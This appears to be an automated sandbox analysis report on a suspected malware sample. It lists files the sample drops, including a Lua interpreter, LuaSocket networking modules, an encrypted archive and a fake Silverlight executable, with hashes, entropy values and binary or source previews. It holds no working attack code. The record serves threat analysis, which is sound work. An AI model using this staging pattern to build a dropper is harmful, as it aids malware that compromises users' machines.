SHA-512:	9D93B4456096000671DF2009BFC28C35CB01D10E146BF6E7ADAC7F1850C0670A0C10C4697E1C02557E0B67AC317A1CC4D8509D87E4534377484D8B55D60DC6E0
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........#.K.M.K.M.K.M...C.J.M.).^.H.M.K.L...M...G.i.M...I.H.M.RichK.M.........PE..L...$..F...........!.....`...P.......o.......p...............................................................................z..<............................... ....................................................p..T............................text...._.......`.................. ..`.rdata.......p... ...p..............@..@.data...(........ ..................@....reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\lua\lua51.dll Download File
Process:	C:\Users\user\Desktop\WhQZ6UbCEY.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	11264
Entropy (8bit):	4.576436298539175
Encrypted:	false
SSDEEP:	192:En9bwibw7JYkjcyFZNcvqr0Py3v7u8meG1+mlXzI+eN1qyOd8cw/RsT9QwHzBDkf:En9ZPvqr0uzu8meYyOd8cqsT9QwHFYf
MD5:	7FA818F532EFFD80CF7C1C54676E5A0D
SHA1:	05CE44C8D0672C9F3CE66436C592442377E69DBA
SHA-256:	1C2D1BA8425139D45DE89192D2AE4982E9581F8AE0F22B8497AA0055080237CA
SHA-512:	38BAED895BC71BB890E91A92909F6E78AD34569CE6C7EFD8BD9DB50080DA22697A085F98A3465C3E31165FB9029644E5A0F6BC5BA17D71D7F0DCD31784F0811D
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ka.C...C...C...d.t.@...C.......d.u.B...d.s.B...d.w.B...RichC...........................PE..L.....H...........!.........$............... ...............................`......................................@,......."..(....@../....................P....................................................... ...............................text............................... ..`.rdata..5.... ......................@..@.rsrc.../....@......."..............@..@.reloc..(....P.......*..............@..B........................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\lua\lua\ltn12.lua Download File
Process:	C:\Users\user\Desktop\WhQZ6UbCEY.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	8177
Entropy (8bit):	4.022810400753856
Encrypted:	false
SSDEEP:	192:RYfAp6an3GBkiwbbCk2ecK1PAM5k7vxMK+IYlUGoLhA4jxkKQpLMH6Y6Fdhi6zqN:Rp2BkBCk2eYM6xMLXNBFT1wMuDzl2c
MD5:	3DFC54EF5C4D74C9558B503EA5595D0D
SHA1:	79016426AB7D0D6DE6C2316B9EA02D8CBF5FC53A
SHA-256:	688B7D780603FB9AA75F80F178E8451AED347D0112FD526591108A2D4C98AB50
SHA-512:	F79CADFF428C375EA174279A9ADA186F02FE43518CF0549D24FB1CD3288C1D15377558E59BFE2EDA55C7E7B204B04FD37A00A76DBDECB475AC09CFB331043194
Malicious:	false
Preview:	-----------------------------------------------------------------------------.-- LTN12 - Filters, sources, sinks and pumps..-- LuaSocket toolkit..-- Author: Diego Nehab.-- RCS ID: $Id: ltn12.lua,v 1.31 2006/04/03 04:45:42 diego Exp $.-----------------------------------------------------------------------------..-----------------------------------------------------------------------------.-- Declare module.-----------------------------------------------------------------------------.local string = require("string").local table = require("table").local base = _G.module("ltn12")..filter = {}.source = {}.sink = {}.pump = {}..-- 2048 seems to be better in windows....BLOCKSIZE = 2048._VERSION = "LTN12 1.0.1"..-----------------------------------------------------------------------------.-- Filter stuff.-----------------------------------------------------------------------------.-- returns a high level filter that cycles a low-level filter.function filter.cycle(low, ctx, extra). base.asser

C:\ProgramData\lua\lua\mime.lua Download File
Process:	C:\Users\user\Desktop\WhQZ6UbCEY.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	2433
Entropy (8bit):	4.689032691656553
Encrypted:	false
SSDEEP:	48:LPCblzaxlQ/2JYSLa0aKyS+E1ISlSmSRE/SgWmikzbbyS/pbmbeE/Sw//SxISnl:LKslMuYSVa7S+E1ISl9SRE/SgWmikOS/
MD5:	6042DE20EE4CACB2089388F1038BB92B
SHA1:	855102721C46ABC38A5122C41BEA1ADB6EA296AA
SHA-256:	7D02031927FFD905700FD0C24E1ECD8CEB3CA8D8CFA85D49DE2EAAC9B43FFCF9
SHA-512:	CD5A00182AFFA97528DB3C06B97D3C0C0827B35D6BBD1A48612709692A15FE3D935964C16091F373B38C19BDAF15C52968BCA11C3EDA5E8EA11AB421A219C661
Malicious:	false
Preview:	-----------------------------------------------------------------------------.-- MIME support for the Lua language..-- Author: Diego Nehab.-- Conforming to RFCs 2045-2049.-- RCS ID: $Id: mime.lua,v 1.29 2007/06/11 23:44:54 diego Exp $.-----------------------------------------------------------------------------..-----------------------------------------------------------------------------.-- Declare module and import dependencies.-----------------------------------------------------------------------------.local base = _G.local ltn12 = require("ltn12").local mime = require("mime.core").local io = require("io").local string = require("string").module("mime")..-- encode, decode and wrap algorithm tables.encodet = {}.decodet = {}.wrapt = {}..-- creates a function that chooses a filter by name from a given table.local function choose(table). return function(name, opt1, opt2). if base.type(name) ~= "string" then. name, opt1, opt2 = "default", name, opt1. end.

C:\ProgramData\lua\lua\socket.lua Download File
Process:	C:\Users\user\Desktop\WhQZ6UbCEY.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4061
Entropy (8bit):	4.30419999491486
Encrypted:	false
SSDEEP:	96:LZCAJAAWACAACsACGAC6vagbFtGWFLRMFh3AOFqaAH:spJTAyTGT6yA6WpRMHl5Y
MD5:	F8D9F766CE71816A68C90BB12A29EED9
SHA1:	EDA6100BC1DFA511682D7F98C67342B48538EB17
SHA-256:	CB1BF14BAA252740B8AB681189E746F401A2E2B06086469BB5884E5564B12861
SHA-512:	A2F04D91ED4EEDCE4AEAD5C07CD7C98E8CC5E3CE03CA3C70705968BDCAF6CE9277E3F3E2965A0DD66E817353511EA8DFB2199AEFB207FE5B2FA86F831F9013F8
Malicious:	false
Preview:	-----------------------------------------------------------------------------.-- LuaSocket helper module.-- Author: Diego Nehab.-- RCS ID: $Id: socket.lua,v 1.22 2005/11/22 08:33:29 diego Exp $.-----------------------------------------------------------------------------..-----------------------------------------------------------------------------.-- Declare module and import dependencies.-----------------------------------------------------------------------------.local base = _G.local string = require("string").local math = require("math").local socket = require("socket.core").module("socket")..-----------------------------------------------------------------------------.-- Exported auxiliar functions.-----------------------------------------------------------------------------.function connect(address, port, laddress, lport). local sock, err = socket.tcp(). if not sock then return nil, err end. if laddress then. local res, err = sock:bind(laddress, lport, -1).

C:\ProgramData\lua\lua\socket\ftp.lua Download File
Process:	C:\Users\user\Desktop\WhQZ6UbCEY.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	9120
Entropy (8bit):	4.711756973934954
Encrypted:	false
SSDEEP:	192:Ib9n9btwO8RiYH21IcNhvU632OzjMxwcjvu0xT+FHWWkbssMPP3IaeevDZYgnVJc:Ib99twO84z1dfvU42O3MFjvu00kdM34x
MD5:	A8FBE980F396BCCFDAA5671A981E60CD
SHA1:	C2AE1816545E52347D359475E846997056865DB1
SHA-256:	CB373CD081A8FFBC71F67D359A0D2C7B8BC7A4DB7EF720364700A534773B2BFD
SHA-512:	89332CD5079CC3B1E2AB2553E7425919A2463B7AACFC51371D0C431160DFC4A0B3812597CC1DB43D476C5332D20334D1D904B1EDCC2E6AB81415514ABE9FF307
Malicious:	false
Preview:	-----------------------------------------------------------------------------.-- FTP support for the Lua language.-- LuaSocket toolkit..-- Author: Diego Nehab.-- RCS ID: $Id: ftp.lua,v 1.45 2007/07/11 19:25:47 diego Exp $.-----------------------------------------------------------------------------..-----------------------------------------------------------------------------.-- Declare module and import dependencies.-----------------------------------------------------------------------------.local base = _G.local table = require("table").local string = require("string").local math = require("math").local socket = require("socket").local url = require("socket.url").local tp = require("socket.tp").local ltn12 = require("ltn12").module("socket.ftp")..-----------------------------------------------------------------------------.-- Program constants.-----------------------------------------------------------------------------.-- timeout in seconds before the program gives up on a connecti

C:\ProgramData\lua\lua\socket\http.lua Download File
Process:	C:\Users\user\Desktop\WhQZ6UbCEY.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	12193
Entropy (8bit):	4.5307471750601085
Encrypted:	false
SSDEEP:	192:SsHcg8Z5jISm65NFMh1KoKWperguRbkrCIzokDk+9yuPTTbVVaajhDyh3bbocLmh:SsHcgCj/BK0U6q5B4x8bHRlWh3HzqCsD
MD5:	811E12534358F97907079EC49DB9D753
SHA1:	CDECAA0560F73A613F405BF9EC75F16A6478F66C
SHA-256:	64480FE4BC09A432E5A25C10F5818206FF86D44A945045DF3BDBF433289C0F8E
SHA-512:	B827A96C4D681F066C593953EC589CF3CF6F171D5F9474ED00823D92772C231DCA39C753DDFCAD5AE97BB4734206B3C53FB547A0A4056C652F6032CE945BF4CC
Malicious:	false
Preview:	-----------------------------------------------------------------------------.-- HTTP/1.1 client support for the Lua language..-- LuaSocket toolkit..-- Author: Diego Nehab.-- RCS ID: $Id: http.lua,v 1.70 2007/03/12 04:08:40 diego Exp $.-----------------------------------------------------------------------------..-----------------------------------------------------------------------------.-- Declare module and import dependencies.-------------------------------------------------------------------------------.local socket = require("socket").local url = require("socket.url").local ltn12 = require("ltn12").local mime = require("mime").local string = require("string").local base = _G.local table = require("table").module("socket.http")..-----------------------------------------------------------------------------.-- Program constants.-----------------------------------------------------------------------------.-- connection timeout in seconds.TIMEOUT = 60.-- default port for document ret

C:\ProgramData\lua\lua\socket\smtp.lua Download File
Process:	C:\Users\user\Desktop\WhQZ6UbCEY.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	7961
Entropy (8bit):	4.757717084425106
Encrypted:	false
SSDEEP:	192:E7pzrQ+w+M69s68k3zTHeej6jycQF2vkvD6PD9d0t72ky9p5E:Opzg8+e2j9QF2vkvD6PD9d0tOY
MD5:	1D32E3DC5060E7E2F67B59E8F8376C63
SHA1:	FABE6E3419837D72C9293B2A9339A5BA4CFE04CA
SHA-256:	425CC88963E95F6C4B17C56D62B64302A735901F3EE9808388EC4A4ABDE3A64F
SHA-512:	D9DAFEDCFA789EBD0F763B155B57387AF5911AE52A11392AD1740DF96537943EEBEFCBC06C9DE5B248769A7E89A247E536470DC47286F0BDB74B65CC4B60B0F5
Malicious:	false
Preview:	-----------------------------------------------------------------------------.-- SMTP client support for the Lua language..-- LuaSocket toolkit..-- Author: Diego Nehab.-- RCS ID: $Id: smtp.lua,v 1.46 2007/03/12 04:08:40 diego Exp $.-----------------------------------------------------------------------------..-----------------------------------------------------------------------------.-- Declare module and import dependencies.-----------------------------------------------------------------------------.local base = _G.local coroutine = require("coroutine").local string = require("string").local math = require("math").local os = require("os").local socket = require("socket").local tp = require("socket.tp").local ltn12 = require("ltn12").local mime = require("mime").module("socket.smtp")..-----------------------------------------------------------------------------.-- Program constants.-----------------------------------------------------------------------------.-- timeout for connectio

C:\ProgramData\lua\lua\socket\tp.lua Download File
Process:	C:\Users\user\Desktop\WhQZ6UbCEY.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	3608
Entropy (8bit):	4.397673970581417
Encrypted:	false
SSDEEP:	96:LqGJymNXCA1zp4AT9az+axa3givQyEJvxwU6EAenoqyq:G+ymNymzqsYzRugivv0vxwUbAeno5q
MD5:	B98814D6A43AA13DD01F78F3B573F4F6
SHA1:	C5B11AC3B388424015DC24981B33301B5765EFE3
SHA-256:	8B203683437AF5A3417F1FDF0B14E404208507830510BCE24883F2731E89855A
SHA-512:	CC38A537FD6A2AA69CA0902EEADA5F446A81C3A3EE813BAD0943B7CBC0414798797EB813945B776E06E5C8A52ED6B656E1450A0922D1E53906B53F9F25F01BE0
Malicious:	false
Preview:	-----------------------------------------------------------------------------.-- Unified SMTP/FTP subsystem.-- LuaSocket toolkit..-- Author: Diego Nehab.-- RCS ID: $Id: tp.lua,v 1.22 2006/03/14 09:04:15 diego Exp $.-----------------------------------------------------------------------------..-----------------------------------------------------------------------------.-- Declare module and import dependencies.-----------------------------------------------------------------------------.local base = _G.local string = require("string").local socket = require("socket").local ltn12 = require("ltn12").module("socket.tp")..-----------------------------------------------------------------------------.-- Program constants.-----------------------------------------------------------------------------.TIMEOUT = 60..-----------------------------------------------------------------------------.-- Implementation.-----------------------------------------------------------------------------.-- gets s

C:\ProgramData\lua\lua\socket\url.lua Download File
Process:	C:\Users\user\Desktop\WhQZ6UbCEY.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	10529
Entropy (8bit):	4.478982229938779
Encrypted:	false
SSDEEP:	192:r4h8A2vdLDe8snKvngV4lcIPd70CtKxeeMnwXL2MTePtfkNoy/:rc2vdLYnKv24OIPdwKKxeeMtMTe+Nos
MD5:	2BB6B15F77E9FCF4FC028435D41AD748
SHA1:	660C9E42F154DF0FDF1E70C1323BE1EEC1C57C68
SHA-256:	CC4A567BF317200157EEC4DB6DE1648D658FB0563343D8FC4B6BD6F843711777
SHA-512:	C6D18E9F0A639D97E240B1D66E9B5F8053B2C74BFF50528B34ECD3A90EF641B07F5D29FA5D02D6B75CCEE724E761F9B7578B422E03CC9157D7FEC608A5DE0AA8
Malicious:	false
Preview:	-----------------------------------------------------------------------------.-- URI parsing, composition and relative URL resolution.-- LuaSocket toolkit..-- Author: Diego Nehab.-- RCS ID: $Id: url.lua,v 1.38 2006/04/03 04:45:42 diego Exp $.-----------------------------------------------------------------------------..-----------------------------------------------------------------------------.-- Declare module.-----------------------------------------------------------------------------.local string = require("string").local base = _G.local table = require("table").module("socket.url")..-----------------------------------------------------------------------------.-- Module version.-----------------------------------------------------------------------------._VERSION = "URL 1.0.1"..-----------------------------------------------------------------------------.-- Encodes a string into its escaped hexadecimal representation.-- Input.-- s: binary string to be encoded.-- Returns.-- es

C:\ProgramData\lua\luac.exe Download File
Process:	C:\Users\user\Desktop\WhQZ6UbCEY.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	35840
Entropy (8bit):	4.566792955528008
Encrypted:	false
SSDEEP:	384:p24uT01oatxHepV0o2TMTJs612kMRrL1WvheN3C:plM0tkAkmrLyhG3
MD5:	B747D97542F2E512AB640D0A67D5DA91
SHA1:	3592C9A68B3C7C79F27F4605694B22087F345392
SHA-256:	04674F47DF3515525D98254CBCD6ED0D1824C06AF1A54F896D98F503E3ACFD37
SHA-512:	3C8F4F71C4BC1BDC097AD3C93E4D93DF9E37709BCBAAA8EB0C1A2FA1A851CAF4996C46233B834230A22C7F4377C9B1ECE596FE9D9A1D095197CBA632FB4C7A3F
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........H.z.)e).)e).)e)...).)e)...).)e).&8).)e)...).)e).)d).)e)...).)e)...).)e)...).)e)...).)e)Rich.)e)........PE..L..._..I.....................r.......".......0....@..........................................................................4..P....P...`..........................................................04..@............0..`............................text............................... ..`.rdata.......0......................@..@.data........@.......(..............@....rsrc....`...P...b...*..............@..@........................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\lua\mime\core.dll Download File
Process:	C:\Users\user\Desktop\WhQZ6UbCEY.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	24576
Entropy (8bit):	2.2141270642363833
Encrypted:	false
SSDEEP:	192:lQWutmOKovIcQCGKGc6nYlqXLrSjgGgu/jr:q0GGXLdGpjr
MD5:	05EFB07488C0BA45F35230B0066422F4
SHA1:	FCACC9F294D02070319905F2923DB0E72EFFA295
SHA-256:	BB57E961677111025F9771A50869363D9FDAAFB63B4448DEAA5068CE7F165834
SHA-512:	6598E1CDEEEEFCD2ED89B85F6AFE6EAF258AE6F014CEBFFA05E658EFE909FCC5A7E9388E7FCC251BC47A7D27E3E794D6CA2E43A4B3D6C7FF7DB8CEFCF6B76F1C
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......k.&./kH./kH./kH..wF..kH.Mt[.-kH./kI.7kH..KB.)kH..KL.)kH.Rich/kH.........PE..L.....)G...........!..... ...0.......".......0...............................`.......................................3..M....0..P............................P.......................................................0..d............................text............ .................. ..`.rdata..M....0.......0..............@..@.data........@.......@..............@....reloc.......P.......P..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\lua\socket\core.dll Download File
Process:	C:\Users\user\Desktop\WhQZ6UbCEY.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	4.823143871023984
Encrypted:	false
SSDEEP:	768:9C8uK5l5eK5Z5p5P9QY7X6yTcA5o0d5H/jN:SFY7TlPf
MD5:	58A9887FB51F92E707C80F9CE4196D5C
SHA1:	71925AABC136BB2650EE690326BD396430793A0A
SHA-256:	C0731D74E9071FAF9CC3951A6325A296BFAD073B2D70C5120F028640DA70E0D6
SHA-512:	4DB555733F8BDF15D73C904DEC3C4E893BD72DC2C06A6CF49E6106E01D38D2D7FBFCE732B51A40BADBB39B39FF64380AE03273B6ECA6C90F8E1655AE13F55C65
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............m..m..m.".c..m..l...m..~..m.^.g..m.^.i..m.Rich..m.........................PE..L.....)G...........!.....@...0.......L.......P......................................................................`W..Q....Q..d............................p..$....................................................P..`............................text...~=.......@.................. ..`.rdata.......P.......P..............@..@.data........`.......`..............@....reloc..Z....p.......p..............@..B........................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\lua\zip.dll Download File
Process:	C:\Users\user\Desktop\WhQZ6UbCEY.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	135168
Entropy (8bit):	6.298196898300188
Encrypted:	false
SSDEEP:	1536:BOu7aUyZxULN3AzTnNl4exjAPiefJyMaT8He1jEkrpgu+kFXDIOwnToIfp/H3tNv:BOhdk+NdQkMtSpgYETBfpPtp
MD5:	28B032CE0F99E5271D2E4D501C6B28F3
SHA1:	1C8E86FC9E1801E8E357E98DAA0D6C2AA6EBADF0
SHA-256:	BAD35AB41CEA3584EEA3DDFB19EECE05F69D30DF77B6661C744B1910485A666B
SHA-512:	3CD293CD03CB726D11A2B17C6C8948DEB76EFF532A286DECA03E4A9CE611C2C0E960ED14B3B9824C03883C3A0BA583BAA06A20ED4C7FB9FDF3EF050158D37F8D
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........m.J..EJ..EJ..E..^EH..E.}}EI..Em.~EY..Em.mEo..E...EI..EJ..E...Em.nE...Em.yEK..Em.{EK..ERichJ..E........PE..L.....vF...........!.....P..........Dd.......`...............................0..........................................F.......<.... ..........................@...................................X...@............`...............................text...WK.......P.................. ..`.rdata...Z...`...`...`..............@..@.data...81....... ..................@....reloc........... ..................@..B.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\Microsoft\Silverlight\mssl.lck Download File
Process:	C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\Silverlight.Configuration.exe
File Type:	data
Category:	dropped
Size (bytes):	77
Entropy (8bit):	0.1000009430103235
Encrypted:	false
SSDEEP:	3::
MD5:	6D4E28691607F7EA7B9E9CA8FEC200CD
SHA1:	A6C4E4D4E6157E4826D308F7A286B7590ADE750C
SHA-256:	A462EBA5DCAADF3604552E95B06B28F71F1F238952DDD47FA61C74B9D82FA9FE
SHA-512:	D303780B386B701F4E0BC1DA80D6DD45341987C5E55A0DD09AD952596DAF0EEDAE8C4395C0F88824CBD0D91F8C9D750A0E5D3CCDA3B8AE5147A385BAED253448
Malicious:	false
Preview:	.............................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\DefaultPack[1].EXE Download File
Process:	C:\5a70dbc53fcf0baade86ff\microsoft_defaults.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	downloaded
Size (bytes):	3142024
Entropy (8bit):	7.988242900285446
Encrypted:	false
SSDEEP:	49152:VObq9MAa9BgYhjzBWInuKN/yMyOuj8oQ8oxaYr5B09NZ27/faNtq/zSNitB3C3Ur:0qDygYBzNbN/ys+NIxJr2NIfaNtq/2No
MD5:	F73272887B9EF2C0EDF7D4D4E10948D5
SHA1:	4F55B5B6FEBBC7E8A3406191E9D339CA5C747030
SHA-256:	551FC0AECA4EEF1BB238BB9CAE8C3531FE2496541FEF2E51C264ADFF6BBA877A
SHA-512:	E6CC174E7FD6B78CDACD77CCB87BB694721D961B170575597734E508B4CC6774327E492FC4CB2CD79B335ADE261A68D54C1A330A20BF28AF45182FE9650DD374
Malicious:	false
IE Cache URL:	https://download.microsoft.com/download/0/6/A/06AB8895-E757-4217-9499-33C59E843DAF/ISV/SL5M/DefaultPack.EXE
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........C...C...C.......B.......B.......W.......R...C...........J.....d.B.......B...RichC...................PE..L....s8..................d...f/......j............@.......................... 0.......0...@...... .......................................G/.........../..#....0.........T...............................@............................................text....b.......d.................. ..`.data...H............h..............@....idata..R............j..............@..@.rsrc....G/......H/..\|..............@..@.reloc........0......./.............@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\DefaultPack.EXE Download File
Process:	C:\5a70dbc53fcf0baade86ff\microsoft_defaults.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3142024
Entropy (8bit):	7.988242900285446
Encrypted:	false
SSDEEP:	49152:VObq9MAa9BgYhjzBWInuKN/yMyOuj8oQ8oxaYr5B09NZ27/faNtq/zSNitB3C3Ur:0qDygYBzNbN/ys+NIxJr2NIfaNtq/2No
MD5:	F73272887B9EF2C0EDF7D4D4E10948D5
SHA1:	4F55B5B6FEBBC7E8A3406191E9D339CA5C747030
SHA-256:	551FC0AECA4EEF1BB238BB9CAE8C3531FE2496541FEF2E51C264ADFF6BBA877A
SHA-512:	E6CC174E7FD6B78CDACD77CCB87BB694721D961B170575597734E508B4CC6774327E492FC4CB2CD79B335ADE261A68D54C1A330A20BF28AF45182FE9650DD374
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........C...C...C.......B.......B.......W.......R...C...........J.....d.B.......B...RichC...................PE..L....s8..................d...f/......j............@.......................... 0.......0...@...... .......................................G/.........../..#....0.........T...............................@............................................text....b.......d.................. ..`.data...H............h..............@....idata..R............j..............@..@.rsrc....G/......H/..\|..............@..@.reloc........0......./.............@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Silverlight0.log Download File
Process:	C:\5a70dbc53fcf0baade86ff\install.exe
File Type:	Unicode text, UTF-32, little-endian
Category:	dropped
Size (bytes):	3866
Entropy (8bit):	3.6394127214192764
Encrypted:	false
SSDEEP:	48:gcJE/GEUlGqm8lS86aflIfKxYlyiDDSamly8dg6ddITI6iHGdhd6QaiYjfU:gzm1m07vNIfKKyiHXSyTHTStaYA
MD5:	21B1284F2D0E404F4CE3B6F012E5119C
SHA1:	DC73A66E7D59CB0DB6D4E16DB11A971B975C0C17
SHA-256:	54B3032E740B5E42FB5580D89CE119BDA569E433224E29A40D7C453B9656FAFE
SHA-512:	EF798E9CF809BD4806486093F4FFD80D2025E187F07DD49A537F849AAF3AE9D55AB4E8791834E6584BB432451D6EFC633922B630E2C6F166CEA002F558D6957D
Malicious:	false
Preview:	......[.1.0.:.2.8.:.4.9.]. .S.i.l.v.e.r.l.i.g.h.t. .i.n.s.t.a.l.l.e.r. .l.o.g.g.i.n.g. .s.t.a.r.t.e.d... .....[.1.0.:.2.8.:.5.6.]. .I.n.s.t.a.l.l. .b.u.t.t.o.n. .c.l.i.c.k.e.d... .....[.1.0.:.2.8.:.5.6.]. .S.e.t.t.i.n.g. .d.e.f.a.u.l.t.s. .w.i.t.h. .U.n.i.v.e.r.s.a.l. .I.n.s.t.a.l.l.e.r.:. .....[.1.0.:.2.8.:.5.6.]. .M.i.c.r.o.s.o.f.t._.D.e.f.a.u.l.t.s...e.x.e. .....[.1.0.:.2.8.:.5.6.]. .S.e.t.t.i.n.g. .t.h.e. .d.e.f.a.u.l.t. .h.o.m.e. .p.a.g.e... .....[.1.0.:.2.8.:.5.6.]. .S.e.t.t.i.n.g. .t.h.e. .d.e.f.a.u.l.t. .s.e.a.r.c.h. .e.n.g.i.n.e... .....[.1.0.:.2.8.:.5.6.]. .R.u.n.n.i.n.g. .U.n.i.v.e.r.s.a.l. .I.n.s.t.a.l.l.e.r. .w.i.t.h. .a.r.g.s.:. .....[.1.0.:.2.8.:.5.6.]. .d.h.p.=.t.r.u.e. .d.s.p.=.t.r.u.e. .....[.1.0.:.2.9.:.0.3.]. .N.o.n.e. .=.=.>. .5...1...5.0.9.1.8...0. .....[.1.0.:.2.9.:.0.3.]. .B.e.g.i.n.n.i.n.g. .i.n.s.t.a.l.l. .M.S.I. .w.i.t.h. .t.h.e. .f.o.l.l.o.w.i.n.g. .c.o.m.m.a.n.d. .l.i.n.e.:. .....[.1.0.:.2.9.:.0.3.]. .M.S.I.R.M.S.H.U.T.D.O.W.N.=.2. .R.E.B.O.O.T.=.R.e.a.l.l.

C:\Users\user\AppData\Local\Temp\SilverlightMSI.log Download File
Process:	C:\5a70dbc53fcf0baade86ff\install.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	22734
Entropy (8bit):	3.542888406836728
Encrypted:	false
SSDEEP:	384:5VTP2pO0K+7UVQrmnQosUOnOTjI3EUMJxgoy6uWaCFNks2eHPdFmuy6SaMUbjKS+:rTP2p9K+7BrmQosUOnojI3EUMJxgoy6m
MD5:	D1BD065D11F1CC8D3EF9332CF319006D
SHA1:	80D777CD421029AD633157DAD21C7AB662349909
SHA-256:	04D1486F17FAB224A77822B5A356BDB50F4DA6E399CA107A5CB9969CC083B958
SHA-512:	3F9C4EF78DA39A2976182225D5AE8734E29540080C4374D5F6356888C4B7A3000AB5561FAE0DCE1C17F39507435A938639D695D4D685FCD5F2972B432217DC5E
Malicious:	false
Preview:	..=.=.=. .V.e.r.b.o.s.e. .l.o.g.g.i.n.g. .s.t.a.r.t.e.d.:. .7./.1.2./.2.0.2.1. . .1.0.:.2.9.:.0.3. . .B.u.i.l.d. .t.y.p.e.:. .S.H.I.P. .U.N.I.C.O.D.E. .5...0.0...1.0.0.1.1...0.0. . .C.a.l.l.i.n.g. .p.r.o.c.e.s.s.:. .c.:.\.5.a.7.0.d.b.c.5.3.f.c.f.0.b.a.a.d.e.8.6.f.f.\.i.n.s.t.a.l.l...e.x.e. .=.=.=.....M.S.I. .(.c.). .(.E.0.:.F.4.). .[.1.0.:.2.9.:.0.3.:.9.4.1.].:. .R.e.s.e.t.t.i.n.g. .c.a.c.h.e.d. .p.o.l.i.c.y. .v.a.l.u.e.s.....M.S.I. .(.c.). .(.E.0.:.F.4.). .[.1.0.:.2.9.:.0.3.:.9.4.1.].:. .M.a.c.h.i.n.e. .p.o.l.i.c.y. .v.a.l.u.e. .'.D.e.b.u.g.'. .i.s. .0.....M.S.I. .(.c.). .(.E.0.:.F.4.). .[.1.0.:.2.9.:.0.3.:.9.4.1.].:. ........ .R.u.n.E.n.g.i.n.e.:..... . . . . . . . . . . ........ .P.r.o.d.u.c.t.:. .S.i.l.v.e.r.l.i.g.h.t...m.s.i..... . . . . . . . . . . ........ .A.c.t.i.o.n.:. ..... . . . . . . . . . . ........ .C.o.m.m.a.n.d.L.i.n.e.:. ...............M.S.I. .(.c.). .(.E.0.:.F.4.). .[.1.0.:.2.9.:.0.3.:.9.4.1.].:. .C.l.i.e.n.t.-.s.i.d.e. .a.n.d. .

C:\Users\user\AppData\Local\Temp\lua.zip Download File
Process:	C:\Users\user\Desktop\WhQZ6UbCEY.exe
File Type:	Zip archive data, at least v2.0 to extract
Category:	dropped
Size (bytes):	460128
Entropy (8bit):	7.996790600333928
Encrypted:	true
SSDEEP:	12288:i4rm07kL7Nq/hZXdI1yIPtZfnxBWgYyk/E:zCZKXdXgnnEy+E
MD5:	B92DAD092F14717AC6F01DF274F5FFB5
SHA1:	65B50044514618223AEBC7E542814D467984CBC1
SHA-256:	3AA5BD53A94E34FA533A725174C4F0DAC552EB2B7BC8FDD25AE0A752D05552FF
SHA-512:	2A3B1A8F2A0E567796324AC03C5607F84D9374573EB7A31A12765F0D7F8CEC46AAEF3BE126300D968120AB34289B23CCC32F9E718383BB9B2BF94CA507BD7752
Malicious:	false
Preview:	PK...........R................lua/alien/PK...........R.L$c.2...f......lua/alien/core.dll.}.x.E..IK.)..B....V).6i...)..j.._..-.MMk.l.~\@...K]...^\qe]....we.W..h..e...Z,...z_..U+....M.R.~.~.~.}....y..3.93sf.....I....@8LH'aO....A....6..L......^.k..6?.Z...jjj.j.5..&M].&...Mcs.{AR.d......~&.w.Ep.{.. ?8.......i~...d.u.7....[i.....!...U{..(..AH.$..w.z w..S$r....;s?$l@...........Wi5k...Y.WM.2.GW.,...\....'..{T+...........{..r..0..H......fAkM....[..:. .,.4.[.....B..._G.\.....3]..t....[..nh...Bm@`8H.ut...?..K..........i....'Qq.ZY.Vu......{....o..(sq.v(.......z...E.$...A...+[n......;....?.....U...v...'/m.V/.....;.M..J.pr>p.'.,qC..Z.....An.ey).G..R...i...w.+..........'..s..'.r....j.v'AZE...$J...Ty.....#..=.@yp>..=.s.Z..3......@._...W(AJ{..k.O.....].w.;.S.:)qq.... ..3....e.7.#.+.<5.}<.M..d.....p..D....\TR..6iS.Hg9_C.d.V.Z.hS.G%E\.8y..+..V._Vn{.....k...oW....m...zy9?.....W\|S=<.]:U.$...L...\|3.......9Z%..X.b....@.j.r..t.O9..%QW.n.4.Vw..........Uo

C:\Users\user\AppData\Roaming\Silverlight.exe Download File
Process:	C:\Users\user\Desktop\WhQZ6UbCEY.exe
